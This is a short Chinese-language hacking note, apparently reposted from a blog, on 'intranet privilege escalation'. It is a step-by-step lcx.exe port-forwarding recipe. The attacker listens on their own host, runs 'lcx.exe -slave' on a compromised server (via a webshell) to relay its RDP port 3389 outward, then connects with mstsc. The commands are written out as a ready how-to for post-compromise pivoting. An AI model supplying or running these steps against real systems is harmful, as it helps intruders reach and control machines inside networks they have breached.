内网提权总结

1.端口映射解决内网提权

步骤:

1.在自己的host上的cmd下运行:lcx.exe -listen 51 3389 //意思是监听51端口并转发到3389端口

2.在服务器器上运行:lcx.exe -slave myip 51 serverip 3389 //意思是把服务器的3389端口转发到自己的host的51端口

3.在自己的host上的cmd下运行mstsc,输入127.0.0.1:3389远程连接服务器

在webshell上执行lcx,实现端口转发:

for example:

lcx.exe -slave 127.0.0.1 51 192.168.2.2 3389

使用工具:cmd.exe  lcx.exe

原文地址:https://www.cnblogs.com/milantgh/p/3601882.html